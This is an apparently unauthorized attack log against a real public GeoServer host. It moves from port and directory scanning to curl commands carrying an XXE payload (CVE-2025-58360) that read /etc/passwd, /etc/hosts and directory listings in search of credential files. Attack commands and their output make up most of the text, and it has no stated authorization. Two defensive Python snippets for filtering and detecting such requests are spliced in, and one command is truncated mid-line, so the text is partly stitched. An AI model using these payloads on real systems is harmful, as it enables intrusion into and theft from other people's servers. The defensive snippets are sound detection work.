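Attack target
http://123.179.225.131:8989/indexHome/index.html#/login
Information gathering
IP: China Telecom, Inner Mongolia
Packet capture analysis: the traffic is plaintext, and there is one POST request.
It turned out to be a login page, so I scanned it.
nmap -sS 123.179.225.131 -F -A
The scan failed.
Switched to a different scan type.
nmap -sT 123.179.225.131 -F -A
Almost every port shows as open, and the host is reported as Debian.
A WAF is reported.
Scanned ports with -p 1-10000.
All open... looks like a honeypot.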
└─$ wafw00f http://123.179.225.131:8989
~ WAFW00F : v2.3.1 ~
The Web Application Firewall Fingerprinting Toolkit
[*] Checking http://123.179.225.131:8989
[+] The site http://123.179.225.131:8989 is behind AWS Elastic Load Balancer (Amazon) WAF.
[~] Number of requests: 2
Check what stack it runs.
──(root㉿Willem)-[/home/willem]
└─# whatweb http://123.179.225.131:8989/indexHome/index.html#/login
http://123.179.225.131:8989/indexHome/index.html#/login [200 OK] Country[CHINA][CN], HTML5, HTTPServer[Caddy, MinIO], IP[123.179.225.131], Script[module,text/javascript], Strict-Transport-Security[max-age=31536000; includeSubDomains], Title[地测采综合信息管理平台], UncommonHeaders[content-security-policy,x-amz-request-id,x-content-type-options], X-XSS-Protection[1; mode=block]
Enumerate some directories.
git clone https://github.com/maurosoria/dirsearch.git
cd dirsearch
# Install dependencies
pip3 install -r requirements.txt
# Start scanning (focus on the js, json, php, zip extensions)
python3 dirsearch.py -u http://123.179.225.131:8989 -e js,json,php,zip
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: js, json, php, zip | HTTP method: GET | Threads: 25
Wordlist size: 11252
Target: http://123.179.225.131:8989/
[11:31:04] Scanning:
[11:32:25] 404 - 42B - /api/
[11:32:25] 404 - 42B - /api/2/issue/createmeta
[11:32:25] 404 - 42B - /api/_swagger_/
[11:32:25] 404 - 42B - /api/2/explore/
[11:32:25] 404 - 42B - /api/api
[11:32:25] 404 - 42B - /api/api-docs
[11:32:25] 404 - 42B - /api/apidocs
[11:32:25] 404 - 42B - /api/apidocs/swagger.json
[11:32:25] 404 - 42B - /api/application.wadl
[11:32:25] 404 - 42B - /api/cask/graphql
[11:32:25] 404 - 42B - /api/batch
[11:32:25] 404 - 42B - /api/chat
[11:32:25] 404 - 42B - /api/config
[11:32:25] 404 - 42B - /api/config.json
[11:32:25] 404 - 42B - /api/copy
[11:32:25] 404 - 42B - /api/credentials.json
[11:32:25] 404 - 42B - /api/credential.json
[11:32:25] 404 - 42B - /api/create
[11:32:25] 404 - 42B - /api/database.json
[11:32:25] 404 - 42B - /api/delete
[11:32:25] 404 - 42B - /api/docs
[11:32:25] 404 - 42B - /api/docs/
[11:32:25] 404 - 42B - /api/embed
[11:32:25] 404 - 42B - /api/embeddings
[11:32:25] 404 - 42B - /api/error_log
[11:32:25] 404 - 42B - /api/heartbeat
[11:32:25] 404 - 42B - /api/generate
[11:32:25] 404 - 42B - /api/index.html
[11:32:25] 404 - 42B - /api/jsonws
[11:32:25] 404 - 42B - /api/jsonws/invoke
[11:32:25] 404 - 42B - /api/package_search/v4/documentation
[11:32:25] 404 - 42B - /api/login.json
[11:32:25] 404 - 42B - /api/profile
[11:32:25] 404 - 42B - /api/proxy
[11:32:25] 404 - 42B - /api/ps
[11:32:25] 404 - 42B - /api/push
[11:32:25] 404 - 42B - /api/show
[11:32:25] 404 - 42B - /api/__swagger__/
[11:32:25] 404 - 42B - /api/snapshots
[11:32:25] 404 - 42B - /api/swagger
[11:32:25] 404 - 42B - /api/spec/swagger.json
[11:32:25] 404 - 42B - /api/swagger-ui.html
[11:32:25] 404 - 42B - /api/swagger.json
[11:32:25] 404 - 42B - /api/swagger.yml
[11:32:26] 404 - 42B - /api/swagger/index.html
[11:32:26] 404 - 42B - /api/swagger/static/index.html
[11:32:26] 404 - 42B - /api/swagger/swagger
[11:32:26] 404 - 42B - /api/swagger/ui/index
[11:32:26] 404 - 42B - /api/tags
[11:32:26] 404 - 42B - /api/user.json
[11:32:26] 404 - 42B - /api/timelion/run
[11:32:26] 404 - 42B - /api/users.json
[11:32:26] 404 - 42B - /api/v1
[11:32:26] 404 - 42B - /api/v1/
[11:32:26] 404 - 42B - /api/v1/swagger.json
[11:32:26] 404 - 42B - /api/v1/swagger.yaml
[11:32:26] 404 - 42B - /api/v2
[11:32:26] 404 - 42B - /api/v2/swagger.json
[11:32:26] 404 - 42B - /api/v2/helpdesk/discover
[11:32:26] 404 - 42B - /api/v2/swagger.yaml
[11:32:26] 404 - 42B - /api/v2/
[11:32:26] 404 - 42B - /api/v3
[11:32:26] 404 - 42B - /api/v4
[11:32:26] 404 - 42B - /api/vendor/phpunit/phpunit/phpunit
[11:32:26] 200 - 105B - /api/version
[11:32:26] 404 - 42B - /api/pull
[11:32:26] 404 - 42B - /api/whoami
[11:32:26] 404 - 42B - /api/swagger.yaml
[11:32:43] 404 - 42B - /cloud/
[11:33:05] 307 - 63B - /file/ -> http://123.179.225.131:5000
[11:33:06] 404 - 207B - /files/
[11:33:06] 404 - 207B - /files/cache/
[11:33:07] 404 - 207B - /files/tmp/
[11:33:06] 404 - 18KB - /Files/binder.autosave
[11:33:06] 404 - 18KB - /Files/binder.backup
[11:33:07] 404 - 18KB - /Files/Docs/docs.checksum
[11:33:07] 404 - 18KB - /Files/search.indexes
[11:33:07] 404 - 18KB - /Files/user.lock
[11:33:07] 404 - 46B - /flow/registries
[11:33:11] 200 - 697B - /geoserver/index.html
[11:33:29] 302 - 0B - /login -> /indexHome/index.html
[11:34:33] 404 - 42B - /upload/
[11:34:33] 404 - 42B - /upload/1.php
[11:34:33] 404 - 42B - /upload/b_user.csv
[11:34:33] 404 - 42B - /upload/2.php
[11:34:33] 404 - 42B - /upload/b_user.xls
[11:34:33] 404 - 42B - /upload/loginIxje.php
[11:34:33] 404 - 42B - /upload/test.php
[11:34:33] 404 - 42B - /upload/test.txt
[11:34:33] 404 - 42B - /upload/upload.php
Ran a nuclei scan; nothing much turned up.
~/go/bin/nuclei -u http://123.179.225.131:8989 -tags api,exposure,misconfig
[WRN] Found 1909 templates with syntax error (use -validate flag for further examination)
[INF] Current nuclei version: v2.9.15 (outdated)
[INF] Current nuclei-templates version: v10.3.5 (latest)
[INF] New templates added in latest release: 57
[INF] Templates loaded for current scan: 1589
[INF] Targets loaded for current scan: 1
[INF] Templates clustered: 516 (Reduced 480 Requests)
[INF] Using Interactsh Server: oast.live
[CVE-2025-27505] [http] [medium] http://123.179.225.131:8989/geoserver/rest.html
[http-missing-security-headers:x-permitted-cross-domain-policies] [http] [info] http://123.179.225.131:8989/indexHome/index.html
[http-missing-security-headers:referrer-policy] [http] [info] http://123.179.225.131:8989/indexHome/index.html
[http-missing-security-headers:clear-site-data] [http] [info] http://123.179.225.131:8989/indexHome/index.html
[http-missing-security-headers:cross-origin-embedder-policy] [http] [info] http://123.179.225.131:8989/indexHome/index.html
[http-missing-security-headers:cross-origin-opener-policy] [http] [info] http://123.179.225.131:8989/indexHome/index.html
[http-missing-security-headers:cross-origin-resource-policy] [http] [info] http://123.179.225.131:8989/indexHome/index.html
[http-missing-security-headers:permissions-policy] [http] [info] http://123.179.225.131:8989/indexHome/index.html
[http-missing-security-headers:x-frame-options] [http] [info] http://123.179.225.131:8989/indexHome/index.html
Only one finding, not much use; try another tag.
nuclei -u http://123.179.225.131:8989 -tags geoserver
[INF] nuclei-templates are not installed, installing...
[INF] Successfully installed nuclei-templates at /root/nuclei-templates
[WRN] Found 1909 templates with syntax error (use -validate flag for further examination)
[INF] Current nuclei version: v2.9.15 (outdated)
[INF] Current nuclei-templates version: v10.3.5 (latest)
[INF] New templates added in latest release: 57
[INF] Templates loaded for current scan: 8
[INF] Targets loaded for current scan: 1
[INF] Using Interactsh Server: oast.fun
[CVE-2025-58360] [http] [high] http://123.179.225.131:8989/geoserver/wfs?service=WMS&request=GetMap
[CVE-2025-27505] [http] [medium] http://123.179.225.131:8989/geoserver/rest.html
[geoserver-login-panel] [http] [info] http://123.179.225.131:8989/geoserver/web/;jsessionid=177EDBE87D609BE0AF6B40DBD395A4A8?0 [2.22.0]
CVE-2025-58360 looks good.
~/go/bin/nuclei -u http://123.179.225.131:8989 -id CVE-2025-58360 -debug
[CVE-2025-58360] Dumped HTTP request for http://123.179.225.131:8989/geoserver/wfs?service=WMS&request=GetMap
POST /geoserver/wfs?service=WMS&request=GetMap HTTP/1.1
Host: 123.179.225.131:8989
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 222
Accept: */*
Accept-Language: en
Content-Type: application/vnd.ogc.sld+xml
Accept-Encoding: gzip
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [ <!ENTITY xxe SYSTEM "/this_file_does_not_exist"> ]>
<StyledLayerDescriptor version="1.0.0">
<NamedLayer><Name>&xxe;</Name></NamedLayer>
</StyledLayerDescriptor>
[DBG] [CVE-2025-58360] Dumped HTTP response http://123.179.225.131:8989/geoserver/wfs?service=WMS&request=GetMap
HTTP/1.1 200 OK
Connection: close
Transfer-Encoding: chunked
Access-Control-Allow-Origin: *
Content-Type: application/vnd.ogc.se_xml;charset=UTF-8
Date: Sun, 14 Dec 2025 09:15:48 GMT
Server: Caddy
X-Frame-Options: SAMEORIGIN
<?xml version="1.0" encoding="UTF-8" standalone="no"?><!DOCTYPE ServiceExceptionReport SYSTEM "http://123.179.225.131:8989/geoserver/schemas/wms/1.1.1/WMS_exception_1_1_1.dtd"> <ServiceExceptionReport version="1.1.1" > <ServiceException>
java.lang.RuntimeException: java.io.FileNotFoundException: /this_file_does_not_exist (No such file or directory)
java.io.FileNotFoundException: /this_file_does_not_exist (No such file or directory)
/this_file_does_not_exist (No such file or directory)
</ServiceException></ServiceExceptionReport>
[CVE-2025-58360:word-1] [http] [high] http://123.179.225.131:8989/geoserver/wfs?service=WMS&request=GetMap
[CVE-2025-58360:status-2] [http] [high] http://123.179.225.131:8989/geoserver/wfs?service=WMS&request=GetMap
http://123.179.225.131:8989/geoserver/wfs?service=WMS&request=GetMap
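On the defensive side, the template's request is recognisable before it reaches GeoServer: an SLD body has no need for a DOCTYPE, so any DTD or entity declaration in it can be refused at a proxy. The following is an added example, not part of the original write-up or of GeoServer; `inspect_prolog` and `verdict` are hypothetical names, and rejecting every DOCTYPE is an assumed policy.

```python
import xml.parsers.expat as expat

SLD_TYPE = "application/vnd.ogc.sld+xml"

# Constructed samples: PROBE is the body from the dump above, BENIGN is a
# made-up SLD naming a hypothetical layer.
PROBE = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [ <!ENTITY xxe SYSTEM "/this_file_does_not_exist"> ]>
<StyledLayerDescriptor version="1.0.0">
<NamedLayer><Name>&xxe;</Name></NamedLayer>
</StyledLayerDescriptor>"""
BENIGN = b"""<?xml version="1.0" encoding="UTF-8"?>
<StyledLayerDescriptor version="1.0.0">
<NamedLayer><Name>roads</Name></NamedLayer>
</StyledLayerDescriptor>"""


class StopAtRoot(Exception):
    """Raised to stop parsing once the prolog (and any DTD) has been read."""


def inspect_prolog(body: bytes) -> dict:
    """Report DOCTYPE and entity declarations without resolving any entity.

    expat gets no external-entity handler, and parsing stops at the first
    element, so no entity reference in the content is ever expanded.
    """
    found = {"doctype": None, "external": [], "internal": [], "malformed": False}

    def on_doctype(name, system_id, public_id, has_internal_subset):
        found["doctype"] = name
        if system_id or public_id:  # external DTD subset
            found["external"].append(("<dtd>", system_id or public_id))

    def on_entity(name, is_param, value, base, system_id, public_id, notation):
        if system_id is not None or public_id is not None:
            found["external"].append((name, system_id))
        else:
            found["internal"].append(name)

    def on_element(name, attrs):
        raise StopAtRoot

    parser = expat.ParserCreate()
    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    parser.StartElementHandler = on_element
    try:
        parser.Parse(body, True)
    except StopAtRoot:
        pass
    except expat.ExpatError:
        found["malformed"] = True
    return found


def verdict(method: str, path: str, content_type: str, body: bytes) -> str:
    """Return 'allow' or a 'block: ...' reason for one request (assumed policy)."""
    ctype = content_type.split(";")[0].strip().lower()
    if method != "POST" or not path.startswith("/geoserver/") or "xml" not in ctype:
        return "allow"
    found = inspect_prolog(body)
    if found["external"]:
        names = ", ".join(f"{n} -> {s}" for n, s in found["external"])
        return f"block: external entity ({names})"
    if found["doctype"] is not None:
        return "block: DOCTYPE present in SLD body"
    if found["malformed"]:
        return "block: body is not well-formed XML"
    return "allow"
```

Using the parser's own declaration callbacks instead of a regular expression means alternate encodings and whitespace tricks in the prolog are handled the same way the XML parser behind the service would read them.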
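[11:33:11] 200 - 697B - /geoserver/index.html
GeoServer is the one product I least want to look at; this time I'll just do a preliminary analysis, since it is fairly easy to understand.
GeoServer is an open-source geospatial data server used to share, edit and publish geospatial data, and it supports multiple standard map service protocols.

It can be used to read directories and files, such as passwords and so on; worth a try, very high risk.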
Modify it to add error-based echo:
curl -v -X POST "http://123.179.225.131:8989/geoserver/wfs?service=WMS&request=GetMap" \
-H "Content-Type: application/vnd.ogc.sld+xml" \
-d '<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "/etc/passwd">
]>
<StyledLayerDescriptor version="1.0.0" >
<NamedLayer>
<Name>&xxe;</Name>
</NamedLayer>
</StyledLayerDescriptor>'
# Try with root privileges and check whether it is possible
Note: Unnecessary use of -X or --request, POST is already inferred.
* Trying 123.179.225.131:8989...
* Connected to 123.179.225.131 (123.179.225.131) port 8989
* using HTTP/1.x
> POST /geoserver/wfs?service=WMS&request=GetMap HTTP/1.1
> Host: 123.179.225.131:8989
> User-Agent: curl/8.12.1
> Accept: */*
> Content-Type: application/vnd.ogc.sld+xml
> Content-Length: 217
>
* upload completely sent off: 217 bytes
< HTTP/1.1 200 OK
< Access-Control-Allow-Origin: *
< Content-Type: application/vnd.ogc.se_xml;charset=UTF-8
< Date: Sun, 14 Dec 2025 08:45:55 GMT
< Server: Caddy
< X-Frame-Options: SAMEORIGIN
< Transfer-Encoding: chunked
<
<?xml version="1.0" encoding="UTF-8" standalone="no"?><!DOCTYPE ServiceExceptionReport SYSTEM "http://123.179.225.131:8989/geoserver/schemas/wms/1.1.1/WMS_exception_1_1_1.dtd"> <ServiceExceptionReport version="1.1.1" > <ServiceException>
Unknown layer: root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
* Connection #0 to host 123.179.225.131 left intact
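</ServiceException></ServiceExceptionReport>
It works, but root access is disabled.
willem then checked the other common sensitive, high-risk files and found none of them, yet the vulnerability is present. Very strange!
The sensitive ones are probably being blocked.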
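Seen from the defender's side, the responses above are distinctive: the WMS error report carries either a filesystem path inside a FileNotFoundException or file content after "Unknown layer:". The following is an added example, not part of the original write-up, that flags such responses in captured response bodies; the function names, the layer-name pattern and the sample records are assumptions constructed for illustration.

```python
import re
from collections import Counter

EXC = re.compile(r"<ServiceException[^>]*>(.*?)</ServiceException>", re.S)
FNF = re.compile(r"java\.io\.FileNotFoundException: (\S+) \(")
UNKNOWN = re.compile(r"Unknown layer:[ \t]*(.*)", re.S)
# Assumption: a real layer name is one token, optionally "workspace:layer".
LAYER_NAME = re.compile(r"[\w.\-]+(:[\w.\-]+)?")


def classify_exception_report(response_body: str) -> dict:
    """Classify one WMS ServiceExceptionReport body by what it discloses."""
    m = EXC.search(response_body)
    if not m:
        return {"signal": "none", "detail": None}
    text = m.group(1).strip()
    fnf = FNF.search(text)
    if fnf:  # server-side path echoed back in an exception message
        return {"signal": "file-path-in-error", "detail": fnf.group(1)}
    unk = UNKNOWN.search(text)
    if unk:
        lines = [ln.strip() for ln in unk.group(1).splitlines() if ln.strip()]
        if len(lines) > 1:  # a layer name never spans lines; file content does
            return {"signal": "multi-line-layer-name", "detail": f"{len(lines)} lines"}
        if lines and not LAYER_NAME.fullmatch(lines[0]):
            return {"signal": "non-layer-text", "detail": lines[0][:40]}
    return {"signal": "none", "detail": None}


def flag_clients(records, threshold=2):
    """records: (client_ip, response_body) pairs; return clients with repeated signals."""
    hits = Counter(c for c, body in records
                   if classify_exception_report(body)["signal"] != "none")
    return sorted(c for c, n in hits.items() if n >= threshold)


def report(inner: str) -> str:
    """Wrap constructed text in the envelope seen in the responses above."""
    return ('<?xml version="1.0" encoding="UTF-8" standalone="no"?>'
            '<ServiceExceptionReport version="1.1.1" > <ServiceException>\n'
            f"      {inner}\n</ServiceException></ServiceExceptionReport>")


# Constructed records; IPs are documentation addresses, file content is made up.
RECORDS = [
    ("192.0.2.10", report("java.lang.RuntimeException: java.io.FileNotFoundException: "
                          "/this_file_does_not_exist (No such file or directory)")),
    ("192.0.2.10", report("Unknown layer: alpha:x:1:1:constructed\nbeta:x:2:2:constructed")),
    ("198.51.100.7", report("Unknown layer: topp:missing_layer")),
    ("198.51.100.7", report("Unknown layer: a2ac9c1c8349")),  # single token: not caught
]

if __name__ == "__main__":
    for client, body in RECORDS:
        print(client, classify_exception_report(body))
    print("flagged:", flag_clients(RECORDS))
```

A single-token disclosure is indistinguishable from a mistyped layer name, so response inspection complements, and does not replace, refusing DOCTYPE declarations on input.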
Check whether this is a physical machine.
└─# curl -X POST "http://123.179.225.131:8989/geoserver/wfs?service=WMS&request=GetMap" \
-H "Content-Type: application/vnd.ogc.sld+xml" \
-d '<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "file:///etc/hostname">
]>
<StyledLayerDescriptor version="1.0.0">
<NamedLayer>
<Name>&xxe;</Name>
</NamedLayer>
</StyledLayerDescriptor>'
<?xml version="1.0" encoding="UTF-8" standalone="no"?><!DOCTYPE ServiceExceptionReport SYSTEM "http://123.179.225.131:8989/geoserver/schemas/wms/1.1.1/WMS_exception_1_1_1.dtd"> <ServiceExceptionReport version="1.1.1" > <ServiceException>
Unknown layer: a2ac9c1c8349
</ServiceException></ServiceExceptionReport>
Something is off, very off.
This does not look like a hostname.
Take a look at the hosts file.
└─# curl -X POST "http://123.179.225.131:8989/geoserver/wfs?service=WMS&request=GetMap" \
-H "Content-Type: application/vnd.ogc.sld+xml" \
-d '<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "file:///etc/hosts">
]>
<StyledLayerDescriptor version="1.0.0">
<NamedLayer>
<Name>&xxe;</Name>
</NamedLayer>
</StyledLayerDescriptor>'
<?xml version="1.0" encoding="UTF-8" standalone="no"?><!DOCTYPE ServiceExceptionReport SYSTEM "http://123.179.225.131:8989/geoserver/schemas/wms/1.1.1/WMS_exception_1_1_1.dtd"> <ServiceExceptionReport version="1.1.1" > <ServiceException>
Unknown layer: 127.0.0.1 localhost
::1 localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
172.19.0.2 a2ac9c1c8349
</ServiceException></ServiceExceptionReport>
...... I am inside Docker, in a container.
Could it be deployed with Docker?
I looked up the install directory online: the official image's install path.
tyledLayerDescriptor>'
<?xml version="1.0" encoding="UTF-8" standalone="no"?><!DOCTYPE ServiceExceptionReport SYSTEM "http://123.179.225.131:8989/geoserver/schemas/wms/1.1.1/WMS_exception_1_1_1.dtd"> <ServiceExceptionReport version="1.1.1" > <ServiceException>
java.lang.RuntimeException: java.io.FileNotFoundException: /geoserver/data_dir/security/users.xml (No such file or directory)
java.io.FileNotFoundException: /geoserver/data_dir/security/users.xml (No such file or directory)
/geoserver/data_dir/security/users.xml (No such file or directory)
</ServiceException></ServiceExceptionReport>
...... it does not exist.
└─# curl -v -X POST "http://123.179.225.131:8989/geoserver/wfs?service=WMS&request=GetMap" \
-H "Content-Type: application/vnd.ogc.sld+xml" \
-d '<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "/">
]>
<StyledLayerDescriptor version="1.0.0" >
<NamedLayer>
<Name>&xxe;</Name>
</NamedLayer>
</StyledLayerDescriptor>'
Note: Unnecessary use of -X or --request, POST is already inferred.
* Trying 123.179.225.131:8989...
* Connected to 123.179.225.131 (123.179.225.131) port 8989
* using HTTP/1.x
> POST /geoserver/wfs?service=WMS&request=GetMap HTTP/1.1
> Host: 123.179.225.131:8989
> User-Agent: curl/8.12.1
> Accept: */*
> Content-Type: application/vnd.ogc.sld+xml
> Content-Length: 207
>
* upload completely sent off: 207 bytes
< HTTP/1.1 200 OK
< Access-Control-Allow-Origin: *
< Content-Type: application/vnd.ogc.se_xml;charset=UTF-8
< Date: Sun, 14 Dec 2025 09:39:50 GMT
< Server: Caddy
< X-Frame-Options: SAMEORIGIN
< Transfer-Encoding: chunked
<
<?xml version="1.0" encoding="UTF-8" standalone="no"?><!DOCTYPE ServiceExceptionReport SYSTEM "http://123.179.225.131:8989/geoserver/schemas/wms/1.1.1/WMS_exception_1_1_1.dtd"> <ServiceExceptionReport version="1.1.1" > <ServiceException>
Unknown layer: .dockerenv
bin
boot
dev
etc
home
lib
lib32
lib64
libx32
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
* Connection #0 to host 123.179.225.131 left intact
</ServiceException></ServiceExceptionReport>
I looked up the install directory online: the official image's install path.
It is installed here.
We found the install shell script.
-H "Content-Type: application/vnd.ogc.sld+xml" \
-d '<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "/proc/self/cwd/">
]>
<StyledLayerDescriptor version="1.0.0" >
<NamedLayer>
<Name>&xxe;</Name>
</NamedLayer>
</StyledLayerDescriptor>'
Note: Unnecessary use of -X or --request, POST is already inferred.
* Trying 123.179.225.131:8989...
* Connected to 123.179.225.131 (123.179.225.131) port 8989
* using HTTP/1.x
> POST /geoserver/wfs?service=WMS&request=GetMap HTTP/1.1
> Host: 123.179.225.131:8989
> User-Agent: curl/8.12.1
> Accept: */*
> Content-Type: application/vnd.ogc.sld+xml
> Content-Length: 221
>
* upload completely sent off: 221 bytes
< HTTP/1.1 200 OK
< Access-Control-Allow-Origin: *
< Content-Type: application/vnd.ogc.se_xml;charset=UTF-8
< Date: Sun, 14 Dec 2025 09:39:32 GMT
< Server: Caddy
< X-Frame-Options: SAMEORIGIN
< Transfer-Encoding: chunked
<
<?xml version="1.0" encoding="UTF-8" standalone="no"?><!DOCTYPE ServiceExceptionReport SYSTEM "http://123.179.225.131:8989/geoserver/schemas/wms/1.1.1/WMS_exception_1_1_1.dtd"> <ServiceExceptionReport version="1.1.1" > <ServiceException>
Unknown layer: apache-tomcat-9.0.68
geoserver_data
install-extensions.sh
startup.sh
* Connection #0 to host 123.179.225.131 left intact
</ServiceException></ServiceExceptionReport>
It is in this folder: /proc/self/cwd/geoserver_data/
└─# curl -v -X POST "http://123.179.225.131:8989/geoserver/wfs?service=WMS&request=GetMap" \
-H "Content-Type: application/vnd.ogc.sld+xml" \
-d '<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "/proc/self/cwd/geoserver_data/">
]>
<StyledLayerDescriptor version="1.0.0" >
<NamedLayer>
<Name>&xxe;</Name>
</NamedLayer>
</StyledLayerDescriptor>'
Note: Unnecessary use of -X or --request, POST is already inferred.
* Trying 123.179.225.131:8989...
* Connected to 123.179.225.131 (123.179.225.131) port 8989
* using HTTP/1.x
> POST /geoserver/wfs?service=WMS&request=GetMap HTTP/1.1
> Host: 123.179.225.131:8989
> User-Agent: curl/8.12.1
> Accept: */*
> Content-Type: application/vnd.ogc.sld+xml
> Content-Length: 236
>
* upload completely sent off: 236 bytes
< HTTP/1.1 200 OK
< Access-Control-Allow-Origin: *
< Content-Type: application/vnd.ogc.se_xml;charset=UTF-8
< Date: Sun, 14 Dec 2025 09:42:14 GMT
< Server: Caddy
< X-Frame-Options: SAMEORIGIN
< Transfer-Encoding: chunked
<
<?xml version="1.0" encoding="UTF-8" standalone="no"?><!DOCTYPE ServiceExceptionReport SYSTEM "http://123.179.225.131:8989/geoserver/schemas/wms/1.1.1/WMS_exception_1_1_1.dtd"> <ServiceExceptionReport version="1.1.1" > <ServiceException>
Unknown layer: coverages
data
demo
global.xml
gwc
gwc-gs.xml
gwc-layers
layergroups
layouts
logging.xml
logs
palettes
plugIns
README.rst
security
styles
uav-data
user_projections
uuuuu
validation
wcs.xml
wfs.xml
wms.xml
wmts.xml
workspaces
www
* Connection #0 to host 123.179.225.131 left intact
</ServiceException></ServiceExceptionReport>
└─# curl -v -X POST "http://123.179.225.131:8989/geoserver/wfs?service=WMS&request=GetMap" \
-H "Content-Type: application/vnd.ogc.sld+xml" \
-d '<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "/proc/self/cwd/geoserver_data/logs">
]>
<StyledLayerDescriptor version="1.0.0" >
<NamedLayer>
<Name>&xxe;</Name>
</NamedLayer>
</StyledLayerDescriptor>'
Note: Unnecessary use of -X or --request, POST is already inferred.
* Trying 123.179.225.131:8989...
* Connected to 123.179.225.131 (123.179.225.131) port 8989
* using HTTP/1.x
> POST /geoserver/wfs?service=WMS&request=GetMap HTTP/1.1
> Host: 123.179.225.131:8989
> User-Agent: curl/8.12.1
> Accept: */*
> Content-Type: application/vnd.ogc.sld+xml
> Content-Length: 240
>
* upload completely sent off: 240 bytes
< HTTP/1.1 200 OK
< Access-Control-Allow-Origin: *
< Content-Type: application/vnd.ogc.se_xml;charset=UTF-8
< Date: Sun, 14 Dec 2025 09:54:40 GMT
< Server: Caddy
< X-Frame-Options: SAMEORIGIN
< Transfer-Encoding: chunked
<
<?xml version="1.0" encoding="UTF-8" standalone="no"?><!DOCTYPE ServiceExceptionReport SYSTEM "http://123.179.225.131:8989/geoserver/schemas/wms/1.1.1/WMS_exception_1_1_1.dtd"> <ServiceExceptionReport version="1.1.1" > <ServiceException>
Unknown layer: DEFAULT_LOGGING.xml
GEOSERVER_DEVELOPER_LOGGING.xml
geoserver.log
geoserver-1.log
geoserver-2.log
GEOTOOLS_DEVELOPER_LOGGING.xml
PRODUCTION_LOGGING.xml
QUIET_LOGGING.xml
TEST_LOGGING.xml
VERBOSE_LOGGING.xml
Combined with nmap showing nearly every port open,
I suspect this is a trap!!!
└─# curl -v -X POST "http://123.179.225.131:8989/geoserver/wfs?service=WMS&request=GetMap" \
-H "Content-Type: application/vnd.ogc.sld+xml" \
-d '<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "/proc/self/cwd/geoserver_data/gwc/u655059a316e60d27ef0cddb0_3857_2d0fc3f8/EPSG_900913_01
">
]>
<StyledLayerDescriptor version="1.0.0" >
<NamedLayer>
<Name>&xxe;</Name>
</NamedLayer>
</StyledLayerDescriptor>'
Note: Unnecessary use of -X or --request, POST is already inferred.
* Trying 123.179.225.131:8989...
* Connected to 123.179.225.131 (123.179.225.131) port 8989
* using HTTP/1.x
> POST /geoserver/wfs?service=WMS&request=GetMap HTTP/1.1
> Host: 123.179.225.131:8989
> User-Agent: curl/8.12.1
> Accept: */*
> Content-Type: application/vnd.ogc.sld+xml
> Content-Length: 295
>
* upload completely sent off: 295 bytes
< HTTP/1.1 200 OK
< Access-Control-Allow-Origin: *
< Content-Type: application/vnd.ogc.se_xml;charset=UTF-8
< Date: Sun, 14 Dec 2025 10:13:35 GMT
< Server: Caddy
< X-Frame-Options: SAMEORIGIN
< Transfer-Encoding: chunked
<
<?xml version="1.0" encoding="UTF-8" standalone="no"?><!DOCTYPE ServiceExceptionReport SYSTEM "http://123.179.225.131:8989/geoserver/schemas/wms/1.1.1/WMS_exception_1_1_1.dtd"> <ServiceExceptionReport version="1.1.1" > <ServiceException>
Unknown layer: 0_0
* Connection #0 to host 123.179.225.131 left intact
</ServiceException></ServiceExceptionReport>
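After searching for a long time, I still do not know where the account credentials are kept. That's it for now; I'm burned out.
At this point it feels like a honeypot, with a WAF.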